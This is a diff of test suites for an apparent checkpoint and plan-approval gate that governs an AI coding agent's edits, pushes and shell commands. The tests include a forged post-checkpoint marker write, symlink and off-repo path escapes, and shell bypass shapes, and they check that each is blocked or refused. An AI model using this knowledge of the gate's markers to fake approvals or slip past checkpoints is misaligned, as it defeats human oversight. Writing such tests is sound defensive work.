-# PV-1/2: no verdict + in-repo target → block WITH the 2-way path hint, and arm.
+# PV-1/2: no verdict + in-repo target + APPROVED plan → block WITH the 2-way path
+# hint, and arm (planapproval redesign: arming requires the approval token).
 reset_state
-assert_blocked "PV-1. in-repo Edit, no path verdict → block with 2-way path hint" \
+seed_approval "$MARKER_DIR" "$PV_SID"
+assert_blocked "PV-1. in-repo Edit (approved), no path verdict → block with 2-way path hint" \
   "$(pv_edit_json "$PV_TARGET")" "nonsrc_write"
 assert_marker_exists "PV-2. PV-1 armed .checkpoint-required (session-namespaced)" "$PV_PRE_REQ"
+# Negative control: same edit with NO approval token → planning → allowed, no arm.
+reset_state
+assert_allowed "PV-2b. in-repo Edit with no approval → allowed (planning)" \
+  "$(pv_edit_json "$PV_TARGET")"
+assert_marker_absent "PV-2c. unapproved in-repo Edit did NOT arm" "$PV_PRE_REQ"
 
 # PV-3/4: nonsrc_write path verdict → Edit downgraded → ALLOWED, no arm.
 reset_state
@@ -2056,15 +2125,18 @@ assert_allowed "PV-5. read_only path verdict → Edit allowed (downgrade)" \
 assert_marker_absent "PV-6. PV-5 did NOT arm" "$PV_PRE_REQ"
 
 # PV-7: shared_write verdict must NOT downgrade (only nonsrc_write/read_only do).
+# Approved plan seeded so the non-downgraded edit reaches the arm + block.
 reset_state
+seed_approval "$MARKER_DIR" "$PV_SID"
 write_path_verdict "$PV_TARGET" "shared_write"
-assert_blocked "PV-7. shared_write path verdict does NOT downgrade → block" \
+assert_blocked "PV-7. shared_write path verdict (approved) does NOT downgrade → block" \
   "$(pv_edit_json "$PV_TARGET")" "Checkpoint required"
 
 # PV-8: verdict for a DIFFERENT path does not downgrade THIS target (specificity).
 reset_state
+seed_approval "$MARKER_DIR" "$PV_SID"
 write_path_verdict "$TEST_DIR/scripts/other.mjs" "nonsrc_write"
-assert_blocked "PV-8. verdict specificity: other path's verdict → this target still blocks" \
+assert_blocked "PV-8. verdict specificity (approved): other path's verdict → this target still blocks" \
   "$(pv_edit_json "$PV_TARGET")" "Checkpoint required"
 
 # PV-9/10: .review-store/ carve-out — review artifacts never arm, no verdict needed.
@@ -2108,12 +2180,127 @@ assert_allowed "PV-15. gitignored scratch/ path → allowed (gitignore carve-out
 assert_marker_absent "PV-16. PV-15 did NOT arm" "$PV_PRE_REQ"
 
 # PV-17/18: NEGATIVE CONTROL — a tracked, NON-ignored source file (with .gitignore
-# now present) must STILL arm + block. Proves git check-ignore returns "not
-# ignored" for real source and the carve-outs did not over-broaden.
+# now present) must STILL arm + block under an approved plan. Proves git
+# check-ignore returns "not ignored" for real source and the carve-outs did not
+# over-broaden.
 reset_state
-assert_blocked "PV-17. tracked source file (not ignored) → still blocks" \
+seed_approval "$MARKER_DIR" "$PV_SID"
+assert_blocked "PV-17. tracked source file (approved, not ignored) → still blocks" \
   "$(pv_edit_json "$TEST_DIR/hooks/checkpoint-gate.sh")" "Checkpoint required"
 assert_marker_exists "PV-18. PV-17 still armed .checkpoint-required" "$PV_PRE_REQ"
+
+# ============================================================================
+echo ""
+echo "--- Deadlock-combo regression (planapproval, 2026-05-27) ---"
+# ============================================================================
+# Root cause being fixed: a PLANNING session that wrote .pre-checkpoint-done /
+# .post-checkpoint-done as gate bookkeeping armed .checkpoint-required via the
+# old file-write heuristic. The stop-gate (em-recall.mjs --gate stop) then
+# blocked turn-end because .checkpoint-required was armed with no
+# .post-checkpoint-done — and the post-done write was itself refused because
+# .post-checkpoint-required was never armed → DEADLOCK during planning.
+#
+# The fix anchors arming to the approval token: NO approval ⇒ no arm ⇒ no
+# lingering .checkpoint-required ⇒ the stop-gate never trips. These tests assert
+# the checkpoint-gate side of that invariant (the marker the stop-gate keys on
+# is never created during planning), the approved lifecycle still arms, and the
+# token consume is prefix-collision safe.
+
+# DL-1/2: THE deadlock root — planning writes .pre-checkpoint-done with NO
+# approval. The marker write is allowed, but it must NOT arm .checkpoint-required
+# (under the OLD heuristic this arm is exactly what deadlocked the stop-gate).
+reset_state
+DL_SID="bbbbbbbb-2222-4222-8222-bbbbbbbbbbbb"
+assert_allowed "DL-1. planning writes .pre-checkpoint-done (no approval) → allowed (marker write)" \
+  "$(jq -n --arg cmd "echo 'planning bookkeeping' > $MARKER_DIR/.pre-checkpoint-done.$DL_SID" \
+    --arg cwd "$TEST_DIR" --arg sid "$DL_SID" \
+    '{tool_name:"Bash",tool_input:{command:$cmd},cwd:$cwd,session_id:$sid}')"
+assert_marker_absent "DL-2. planning pre-done write did NOT arm .checkpoint-required.<sid> (deadlock root fixed)" \
+  "$MARKER_DIR/.checkpoint-required.$DL_SID"
+assert_marker_absent "DL-2b. nor the legacy .checkpoint-required literal" \
+  "$MARKER_DIR/.checkpoint-required"
+
+# DL-3: planning attempts a premature .post-checkpoint-done write (no approval,
+# no .post-checkpoint-required) — still blocked (can't fake a post-checkpoint),
+# and crucially leaves NO armed .checkpoint-required behind.
+reset_state
+assert_blocked "DL-3. planning premature post-done write blocked (no post-required)" \
+  "$(jq -n --arg cmd "echo 'x' > $MARKER_DIR/.post-checkpoint-done.$DL_SID" \
+    --arg cwd "$TEST_DIR" --arg sid "$DL_SID" \
+    '{tool_name:"Bash",tool_input:{command:$cmd},cwd:$cwd,session_id:$sid}')" "Checkpoint required"
+assert_marker_absent "DL-4. premature post-done attempt did NOT arm .checkpoint-required.<sid>" \
+  "$MARKER_DIR/.checkpoint-required.$DL_SID"
+
+# DL-5: approved lifecycle — the SAME pre-done write, but WITH an approval token,
+# DOES keep a real checkpoint. Edit arms+consumes; then the pre-done write is the
+# normal implementation flow. Contrast with DL-1/2 (planning).
+reset_state
+DL_SID_OK="cccccccc-3333-4333-8333-cccccccccccc"
+seed_approval "$MARKER_DIR" "$DL_SID_OK"
+echo "$(jq -n --arg fp "$TEST_DIR/scripts/impl.mjs" --arg cwd "$TEST_DIR" --arg sid "$DL_SID_OK" \
+  '{tool_name:"Edit",tool_input:{file_path:$fp},cwd:$cwd,session_id:$sid}')" | run_hook >/dev/null 2>&1
+assert_marker_exists "DL-5. approved in-repo Edit armed .checkpoint-required.<sid>" \
+  "$MARKER_DIR/.checkpoint-required.$DL_SID_OK"
+assert_marker_absent "DL-6. arm consumed the approval token (one-shot)" \
+  "$MARKER_DIR/.plan-approved.$DL_SID_OK"
+
+# DL-7/8: gate-side consume is prefix-collision safe (codex R2 P1 — sid=X must
+# not clobber a sibling whose name starts with X). Seed approval for DL_SID_OK2
+# AND a sibling file `.plan-approved.<DL_SID_OK2>-sib`; arming for DL_SID_OK2
+# must remove ONLY the exact token, leaving the sibling intact.
+reset_state
+DL_SID_OK2="dddddddd-4444-4444-8444-dddddddddddd"
+seed_approval "$MARKER_DIR" "$DL_SID_OK2"
+: > "$MARKER_DIR/.plan-approved.${DL_SID_OK2}-sib"
+echo "$(jq -n --arg fp "$TEST_DIR/scripts/impl2.mjs" --arg cwd "$TEST_DIR" --arg sid "$DL_SID_OK2" \
+  '{tool_name:"Edit",tool_input:{file_path:$fp},cwd:$cwd,session_id:$sid}')" | run_hook >/dev/null 2>&1
+assert_marker_absent "DL-7. consume removed the EXACT approval token .plan-approved.<sid>" \
+  "$MARKER_DIR/.plan-approved.$DL_SID_OK2"
+assert_marker_exists "DL-8. consume did NOT clobber prefix-collision sibling .plan-approved.<sid>-sib" \
+  "$MARKER_DIR/.plan-approved.${DL_SID_OK2}-sib"
+
+# DL-9/10: review F1 regression — a CONCURRENT session's live .plan-approved
+# token must SURVIVE another session's push sweep. `.plan-approved` is
+# deliberately excluded from CHECKPOINT_CLEANUP_MARKERS so the push glob
+# (`<marker>.*`, all sessions) does NOT delete it — otherwise session B would
+# silently skip its pre-checkpoint after session A pushes. The quartet IS still
+# swept (convergence semantics preserved).
+reset_state
+DL_SID_B="eeeeeeee-5555-4555-8555-eeeeeeeeeeee"
+: > "$MARKER_DIR/.plan-approved.$DL_SID_B"     # session B's live approval token (pre-arm)
+touch "$POST_REQ"                               # session A's post-checkpoint armed
+echo "e2e done" > "$POST_DONE"                  # and satisfied → push is allowed → cleanup runs
+echo "$(mock_json 'Bash' 'git push origin main')" | run_hook >/dev/null 2>&1   # allowed push → cleanup sweep
+assert_marker_exists "DL-9. concurrent session's .plan-approved token SURVIVED another session's push sweep (F1)" \
+  "$MARKER_DIR/.plan-approved.$DL_SID_B"
+assert_marker_absent "DL-10. push sweep still cleared the satisfied quartet (.post-checkpoint-done) — convergence intact" \
+  "$POST_DONE"
+
+# DL-11/12/13: codex PR-review P1 regression — a FAILING installed arm helper
+# must NOT consume the approval token while leaving the write ungated. The
+# arm/consume is transactional: if `checkpoint-marker.mjs` exits non-zero (no
+# .checkpoint-required created), the token is PRESERVED and the write fails
+# CLOSED (still blocked), so a retry can arm. (Was: `|| true` swallowed the
+# failure, consume ran unconditionally → token gone + no checkpoint + write
+# ALLOWED ungated.)
+reset_state
+DL_FAIL_HOME=$(mktemp -d)
+mkdir -p "$DL_FAIL_HOME/.episodic-memory/scripts"
+printf '#!/usr/bin/env node\nprocess.exit(1)\n' > "$DL_FAIL_HOME/.episodic-memory/scripts/checkpoint-marker.mjs"
+DL_FAIL_SID="ffffffff-6666-4666-8666-ffffffffffff"
+seed_approval "$MARKER_DIR" "$DL_FAIL_SID"
+DL_FAIL_OUT=$(echo "$(jq -n --arg fp "$TEST_DIR/scripts/x.mjs" --arg cwd "$TEST_DIR" --arg sid "$DL_FAIL_SID" \
+  '{tool_name:"Edit",tool_input:{file_path:$fp},cwd:$cwd,session_id:$sid}')" | HOME="$DL_FAIL_HOME" bash "$HOOK" 2>/dev/null)
+if echo "$DL_FAIL_OUT" | grep -q '"decision".*"block"'; then
+  echo "  ✓ DL-11. failed arm helper → write FAILS CLOSED (still blocked, not allowed ungated)"; ((passed++))
+else
+  echo "  ✗ DL-11. failed arm helper → expected block, got: $DL_FAIL_OUT"; ((failed++))
+fi
+assert_marker_absent "DL-12. failed arm did NOT create .checkpoint-required.<sid>" \
+  "$MARKER_DIR/.checkpoint-required.$DL_FAIL_SID"
+assert_marker_exists "DL-13. failed arm PRESERVED the approval token (not consumed — retry can arm)" \
+  "$MARKER_DIR/.plan-approved.$DL_FAIL_SID"
+rm -rf "$DL_FAIL_HOME"
 
 echo ""
 echo "Passed: $passed"

--- a/tests/test-checkpoints-migration.mjs
+++ b/tests/test-checkpoints-migration.mjs
@@ -312,6 +312,34 @@ test('em-session-end-prompt removes non-plan markers; F12 preserves legacy + rem
   }
 })
 
+test('SessionEnd removes own-session .plan-approved.<sid>; preserves a concurrent session token (review F2)', () => {
+  // Review F2: `.plan-approved` is excluded from the push sweep (F1), so
+  // SessionEnd is its only own-session reaper. It must remove the ENDING
+  // session's `.plan-approved.<sid>` (orphan from approve-but-never-implement)
+  // while preserving a CONCURRENT session's live token (cross-session safety,
+  // mirrors the F12 plan-marker contract).
+  const root = setupRepo()
+  const sid = 'session-end-A'
+  const otherSid = 'concurrent-B'
+  for (const dir of ['.checkpoints', '.claude']) {
+    fs.mkdirSync(path.join(root, dir), { recursive: true })
+    fs.writeFileSync(path.join(root, dir, `.plan-approved.${sid}`), 'x')        // own (orphan)
+    fs.writeFileSync(path.join(root, dir, `.plan-approved.${otherSid}`), 'x')   // concurrent (live)
+  }
+  execSync(`node ${SESSION_END}`, {
+    cwd: root,
+    input: JSON.stringify({ session_id: sid, hook_event_name: 'SessionEnd' }),
+    stdio: ['pipe', 'pipe', 'ignore'],
+    env: { ...process.env, HOME: root }
+  })
+  for (const dir of ['.checkpoints', '.claude']) {
+    assertMissing(path.join(root, dir, `.plan-approved.${sid}`),
+      `F2: own-session ${dir}/.plan-approved.${sid} should be removed at SessionEnd`)
+    assertExists(path.join(root, dir, `.plan-approved.${otherSid}`),
+      `F2: concurrent ${dir}/.plan-approved.${otherSid} must be PRESERVED (cross-session safety)`)
+  }
+})
+
 test('SessionEnd with invalid session_id leaves all plan-markers untouched', () => {
   // F12: invalid sid → skip plan-marker cleanup entirely. Non-plan markers
   // continue to clean up normally.

--- a/tests/test-classifier-marker.mjs
+++ b/tests/test-classifier-marker.mjs
@@ -633,6 +633,205 @@ test('§CF4 --command-file write then inline --read hit (write path honors --com
   assert.strictEqual(r.label, 'read_only')
 })
 
+// ----- PR-B2 S3: --target-path path-verdict mode (§11/§14-F4/§15-C2) -----
+
+test('§P1 path verdict write + read round-trip (existing target)', () => {
+  const repo = mkrepo('p1')
+  const sid = 's_p1_' + crypto.randomBytes(4).toString('hex')
+  const target = path.join(repo, 'docs', 'note.md')
+  fs.mkdirSync(path.dirname(target), { recursive: true })
+  fs.writeFileSync(target, '# note')
+
+  const w = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid,
+    '--label', 'nonsrc_write', '--confidence', '0.9', '--reason', 'doc, not source'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(w.status, 0, `write failed: ${w.stderr}`)
+  assert.strictEqual(parseStdout(w).label, 'nonsrc_write')
+
+  const r = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(r.status, 0, `read failed: ${r.stderr}`)
+  const rj = parseStdout(r)
+  assert.strictEqual(rj.status, 'hit')
+  assert.strictEqual(rj.label, 'nonsrc_write')
+})
+
+test('§P2 nonexistent target: write key == read key (canonicalize via existing ancestor)', () => {
+  const repo = mkrepo('p2')
+  const sid = 's_p2_' + crypto.randomBytes(4).toString('hex')
+  // None of newdir/sub/gen.md exist yet — Write would create them.
+  const target = path.join(repo, 'newdir', 'sub', 'gen.md')
+
+  const w = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid,
+    '--label', 'nonsrc_write', '--confidence', '0.9', '--reason', 'generated doc'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(w.status, 0, `write failed: ${w.stderr}`)
+  const wsha = parseStdout(w).cache_key
+
+  // Read BEFORE the file is created → must hit (same canonical key).
+  const r1 = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(parseStdout(r1).status, 'hit', 'nonexistent-target read must hit')
+  assert.strictEqual(parseStdout(r1).cache_key, wsha, 'key must match write key')
+
+  // Create the file, read again → key must be stable (still hit).
+  fs.mkdirSync(path.dirname(target), { recursive: true })
+  fs.writeFileSync(target, 'x')
+  const r2 = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(parseStdout(r2).status, 'hit', 'post-create read must still hit')
+  assert.strictEqual(parseStdout(r2).cache_key, wsha, 'key must be stable after file creation')
+})
+
+test('§P3 symlinked ancestor escaping the repo → refused (exit 2)', () => {
+  const repo = mkrepo('p3')
+  const external = mktmp('p3-external')
+  // repo/linkdir → external (outside repo)
+  fs.symlinkSync(external, path.join(repo, 'linkdir'))
+  const target = path.join(repo, 'linkdir', 'evil.mjs')  // canonicalizes outside repo
+  const r = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', 'sid_p3_aaaa',
+    '--label', 'nonsrc_write', '--confidence', '1', '--reason', 'escape attempt'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(r.status, 2, `symlink-escape target must refuse; got ${r.status}`)
+  assert.match(r.stderr, /resolves outside project root/, `expected escape rejection: ${r.stderr}`)
+})
+
+test('§P4 off-repo target → refused (exit 2)', () => {
+  const repo = mkrepo('p4')
+  const elsewhere = mktmp('p4-elsewhere')
+  const target = path.join(elsewhere, 'foo.mjs')
+  const r = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', 'sid_p4_aaaa',
+    '--label', 'nonsrc_write', '--confidence', '1', '--reason', 'off-repo'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(r.status, 2, `off-repo target must refuse; got ${r.status}`)
+  assert.match(r.stderr, /resolves outside project root/)
+})
+
+test('§P5 namespace segregation: path tuple key never collides with a command key', () => {
+  const repo = mkrepo('p5')
+  const sid = 's_p5_' + crypto.randomBytes(4).toString('hex')
+  const target = path.join(repo, 'x.mjs')
+  fs.writeFileSync(target, 'x')
+
+  // Write a PATH verdict for target.
+  const wp = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid,
+    '--label', 'nonsrc_write', '--confidence', '0.9', '--reason', 'path'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  const pathKey = parseStdout(wp).cache_key
+
+  // A COMMAND whose text is exactly the segregating `write:<canonical>` string
+  // must NOT collide with the path tuple's key, and a --command read of it must
+  // miss the path marker.
+  const collidingCmd = `write:${target}`
+  const rc = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--command', collidingCmd, '--session-id', sid
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(rc.status, 1, 'command read must not see the path marker')
+  assert.notStrictEqual(parseStdout(rc).cache_key, pathKey, 'command key must differ from path key')
+})
+
+test('§P6 (axis-9) caller-cwd is a subdir: relative target resolves under repo, marker under repo', () => {
+  const repo = mkrepo('p6')
+  const sid = 's_p6_' + crypto.randomBytes(4).toString('hex')
+  const sub = path.join(repo, 'scripts')
+  fs.mkdirSync(sub)
+
+  // caller-cwd = scripts/, relative target 'gen.mjs' → repo/scripts/gen.mjs.
+  // Helper process cwd MUST be repo (cross-repo check); caller-cwd differs.
+  const w = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', sub,
+    '--target-path', 'gen.mjs', '--session-id', sid,
+    '--label', 'nonsrc_write', '--confidence', '0.9', '--reason', 'rel target'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(w.status, 0, `write failed: ${w.stderr}`)
+
+  // Marker lands under the TARGET project, never under caller cwd.
+  const markerDir = path.join(repo, '.checkpoints', 'classify')
+  assert.ok(fs.readdirSync(markerDir).length > 0, 'marker missing under repo store')
+  assert.ok(!fs.existsSync(path.join(sub, '.checkpoints')), 'marker leaked under caller cwd')
+
+  // Read with the SAME caller-cwd + relative target → hit (key stable).
+  const r = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', sub,
+    '--target-path', 'gen.mjs', '--session-id', sid
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(parseStdout(r).status, 'hit', 'relative-target read must hit')
+})
+
+test('§P7 --target-path label allowlist + read returns the path verdict label', () => {
+  const repo = mkrepo('p7')
+  const sid = 's_p7_' + crypto.randomBytes(4).toString('hex')
+  const target = path.join(repo, 'README-draft.md')
+
+  // Invalid label → exit 2.
+  const bad = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid,
+    '--label', 'evil_inject', '--confidence', '1', '--reason', 'x'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(bad.status, 2, 'invalid label must refuse')
+  assert.match(bad.stderr, /invalid --label/)
+
+  // read_only path verdict round-trips too (gate honors nonsrc_write|read_only).
+  const w = runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid,
+    '--label', 'read_only', '--confidence', '0.9', '--reason', 'draft, not source'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(w.status, 0, `write failed: ${w.stderr}`)
+  const r = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sid
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(parseStdout(r).label, 'read_only')
+})
+
+test('§P8 --target-path is mutually exclusive with --command', () => {
+  const repo = mkrepo('p8')
+  const r = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', path.join(repo, 'x.mjs'), '--command', 'node x.mjs',
+    '--session-id', 'sid_p8_aaaa'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(r.status, 2, 'expected exit 2')
+  assert.match(r.stderr, /mutually exclusive/)
+})
+
+test('§P9 cross-session: path marker from another session does not read back', () => {
+  const repo = mkrepo('p9')
+  const sidA = 's_p9A_' + crypto.randomBytes(4).toString('hex')
+  const sidB = 's_p9B_' + crypto.randomBytes(4).toString('hex')
+  const target = path.join(repo, 'gen.mjs')
+  runHelper(['--write',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sidA,
+    '--label', 'nonsrc_write', '--confidence', '0.9', '--reason', 'A'
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  // Session B reads the same target → miss (session-bound key).
+  const rB = runHelper(['--read',
+    '--project-root', repo, '--caller-cwd', repo,
+    '--target-path', target, '--session-id', sidB
+  ], { cwd: repo, env: { CLAUDE_CODE_SESSION_ID: '' } })
+  assert.strictEqual(rB.status, 1, 'session B must not read session A path marker')
+})
+
 // ----- Runner -----
 async function run() {
   console.log('classifier-marker.mjs tests')

--- a/tests/test-command-classifier.sh
+++ b/tests/test-command-classifier.sh
@@ -194,6 +194,10 @@ assert_label "T80 git commit" "git commit -m wip" "nonsrc_write"
 assert_label "T81 npm install" "npm install" "nonsrc_write"
 assert_label "T82 mkdir" "mkdir -p foo" "nonsrc_write"
 assert_label "T83 node em-store" "node scripts/em-store.mjs --project x" "nonsrc_write"
+# install.mjs deploy tool → nonsrc_write (writes ~/.claude, ~/.episodic-memory, installed
+# artifacts; never repo source). Prevents a first-run misclassification auto-persisting a
+# stale shared_write Tier-0 override (2026-05-26).
+assert_label "T83b node install.mjs --install-hooks" "node install.mjs --tool claude-code --install-hooks --install-hooks-force" "nonsrc_write"
 
 echo ""
 echo "--- Audit P1 (subagent finding 1): shell-keyword / group bypass ---"

--- a/tests/test-command-classifier.sh
+++ b/tests/test-command-classifier.sh
@@ -93,7 +93,7 @@ assert_label "T34 gh pr review --approve" "gh pr review 5 --approve" "push_or_pr
 echo ""
 echo "--- False-positive guards (push detection should NOT fire) ---"
 assert_label "T40 git stash push" "git stash push -m wip" "shared_write"
-assert_label "T41 git commit -m push" "git commit -m push" "shared_write"
+assert_label "T41 git commit -m push" "git commit -m push" "nonsrc_write"
 assert_label "T42 quoted gh pr create in echo" "echo 'gh pr create'" "read_only"
 assert_label "T43 quoted git push in echo" "echo \"git push origin\"" "read_only"
 assert_label "T44 git branch (read shape)" "git branch" "read_only"
@@ -181,7 +181,7 @@ echo "--- Control-operator chain reduction ---"
 # Most-restrictive wins. unsafe > push > shared > marker > read_only.
 assert_label "T70 marker rm then push" "rm .plan-approval-pending && git push" "push_or_pr_create"
 assert_label "T71 ls then rm marker" "ls && rm .plan-approval-pending" "marker_write"
-assert_label "T72 ls then commit" "ls && git commit -m foo" "shared_write"
+assert_label "T72 ls then commit" "ls && git commit -m foo" "nonsrc_write"
 assert_label "T73 ls then bash -c" "ls && bash -c 'foo'" "unsafe_complex"
 assert_label "T74 chained pipe" "ls | grep foo" "read_only"
 assert_label "T75 chained pipe with write" "ls | tee output.txt" "shared_write"
@@ -189,11 +189,11 @@ assert_label "T76 quoted control op" "echo 'a && b'" "read_only"
 assert_label "T77 quoted semicolon" "echo 'foo;bar'" "read_only"
 
 echo ""
-echo "--- shared_write defaults ---"
-assert_label "T80 git commit" "git commit -m wip" "shared_write"
-assert_label "T81 npm install" "npm install" "shared_write"
-assert_label "T82 mkdir" "mkdir -p foo" "shared_write"
-assert_label "T83 node em-store" "node scripts/em-store.mjs --project x" "shared_write"
+echo "--- nonsrc_write (PR-B2 #351: reclassified from shared_write — non-source writes) ---"
+assert_label "T80 git commit" "git commit -m wip" "nonsrc_write"
+assert_label "T81 npm install" "npm install" "nonsrc_write"
+assert_label "T82 mkdir" "mkdir -p foo" "nonsrc_write"
+assert_label "T83 node em-store" "node scripts/em-store.mjs --project x" "nonsrc_write"
 
 echo ""
 echo "--- Audit P1 (subagent finding 1): shell-keyword / group bypass ---"
@@ -219,21 +219,22 @@ assert_label "T101 timeout gh api" "timeout 30 gh api -X POST /foo" "unsafe_comp
 
 echo ""
 echo "--- Codex PR-113 review finding 1: git management subcommands ---"
-# branch/tag/remote/worktree/config: list forms read_only, write forms shared_write.
+# branch/tag/remote/worktree/config: list forms read_only. PR-B2 (#351): write
+# forms are .git ref/config metadata → nonsrc_write (were shared_write).
 assert_label "T110 git branch (list)" "git branch" "read_only"
 assert_label "T111 git branch -a (list)" "git branch -a" "read_only"
-assert_label "T112 git branch foo (create)" "git branch new-topic" "shared_write"
-assert_label "T113 git branch -D foo (delete)" "git branch -D old-topic" "shared_write"
+assert_label "T112 git branch foo (create)" "git branch new-topic" "nonsrc_write"
+assert_label "T113 git branch -D foo (delete)" "git branch -D old-topic" "nonsrc_write"
 assert_label "T114 git tag (list)" "git tag" "read_only"
-assert_label "T115 git tag v1 (create)" "git tag v1.0" "shared_write"
+assert_label "T115 git tag v1 (create)" "git tag v1.0" "nonsrc_write"
 assert_label "T116 git remote (list)" "git remote" "read_only"
 assert_label "T117 git remote -v (list)" "git remote -v" "read_only"
-assert_label "T118 git remote add (write)" "git remote add origin https://x" "shared_write"
+assert_label "T118 git remote add (write)" "git remote add origin https://x" "nonsrc_write"
 assert_label "T119 git worktree list" "git worktree list" "read_only"
-assert_label "T120 git worktree add (write)" "git worktree add /tmp/wt foo" "shared_write"
+assert_label "T120 git worktree add (write)" "git worktree add /tmp/wt foo" "nonsrc_write"
 assert_label "T121 git config user.name (read)" "git config user.name" "read_only"
-assert_label "T122 git config user.name x (write)" "git config user.name foo" "shared_write"
-assert_label "T123 git config --unset (write)" "git config --unset user.name" "shared_write"
+assert_label "T122 git config user.name x (write)" "git config user.name foo" "nonsrc_write"
+assert_label "T123 git config --unset (write)" "git config --unset user.name" "nonsrc_write"
 
 echo ""
 echo "--- Codex PR-113 review finding 2: gh pr review ---"
@@ -274,27 +275,30 @@ assert_label "T164 git config --file path key" "git config --file /tmp/c user.na
 assert_label "T165 git worktree list" "git worktree list" "read_only"
 assert_label "T166 git worktree --help" "git worktree --help" "read_only"
 
-# Write forms still detected (regression).
-assert_label "T170 git branch new-name (create)" "git branch new-topic" "shared_write"
-assert_label "T171 git branch -D delete" "git branch -D old" "shared_write"
-assert_label "T172 git branch --edit-description" "git branch --edit-description" "shared_write"
-assert_label "T173 git branch --edit-description=foo" "git branch --edit-description=foo" "shared_write"
-assert_label "T174 git branch --set-upstream-to=" "git branch --set-upstream-to=origin/main" "shared_write"
-assert_label "T175 git branch --track" "git branch --track main origin" "shared_write"
-assert_label "T176 git tag v1" "git tag v1.0" "shared_write"
-assert_label "T177 git tag -d" "git tag -d v1.0" "shared_write"
-assert_label "T178 git tag -f" "git tag -f v1.0" "shared_write"
-assert_label "T179 git tag -s" "git tag -s v1.0" "shared_write"
-assert_label "T180 git remote add" "git remote add origin https://x" "shared_write"
-assert_label "T181 git remote rename" "git remote rename old new" "shared_write"
-assert_label "T182 git remote set-url" "git remote set-url origin https://y" "shared_write"
-assert_label "T183 git remote prune" "git remote prune origin" "shared_write"
-assert_label "T184 git config user.name foo" "git config user.name foo" "shared_write"
-assert_label "T185 git config --global user.name foo" "git config --global user.name foo" "shared_write"
-assert_label "T186 git config --unset" "git config --unset user.name" "shared_write"
-assert_label "T187 git config --add" "git config --add user.name foo" "shared_write"
-assert_label "T188 git worktree add" "git worktree add /tmp/wt foo" "shared_write"
-assert_label "T189 git worktree remove" "git worktree remove /tmp/wt" "shared_write"
+# Write forms still DETECTED as writes (regression). PR-B2 (#351): these are
+# .git ref/config/worktree metadata, not working-tree source → nonsrc_write
+# (were shared_write). The detection (not read_only) is what the regression
+# guards; the write CLASS changed from arming to free.
+assert_label "T170 git branch new-name (create)" "git branch new-topic" "nonsrc_write"
+assert_label "T171 git branch -D delete" "git branch -D old" "nonsrc_write"
+assert_label "T172 git branch --edit-description" "git branch --edit-description" "nonsrc_write"
+assert_label "T173 git branch --edit-description=foo" "git branch --edit-description=foo" "nonsrc_write"
+assert_label "T174 git branch --set-upstream-to=" "git branch --set-upstream-to=origin/main" "nonsrc_write"
+assert_label "T175 git branch --track" "git branch --track main origin" "nonsrc_write"
+assert_label "T176 git tag v1" "git tag v1.0" "nonsrc_write"
+assert_label "T177 git tag -d" "git tag -d v1.0" "nonsrc_write"
+assert_label "T178 git tag -f" "git tag -f v1.0" "nonsrc_write"
+assert_label "T179 git tag -s" "git tag -s v1.0" "nonsrc_write"
+assert_label "T180 git remote add" "git remote add origin https://x" "nonsrc_write"
+assert_label "T181 git remote rename" "git remote rename old new" "nonsrc_write"
+assert_label "T182 git remote set-url" "git remote set-url origin https://y" "nonsrc_write"
+assert_label "T183 git remote prune" "git remote prune origin" "nonsrc_write"
+assert_label "T184 git config user.name foo" "git config user.name foo" "nonsrc_write"
+assert_label "T185 git config --global user.name foo" "git config --global user.name foo" "nonsrc_write"
+assert_label "T186 git config --unset" "git config --unset user.name" "nonsrc_write"
+assert_label "T187 git config --add" "git config --add user.name foo" "nonsrc_write"
+assert_label "T188 git worktree add" "git worktree add /tmp/wt foo" "nonsrc_write"
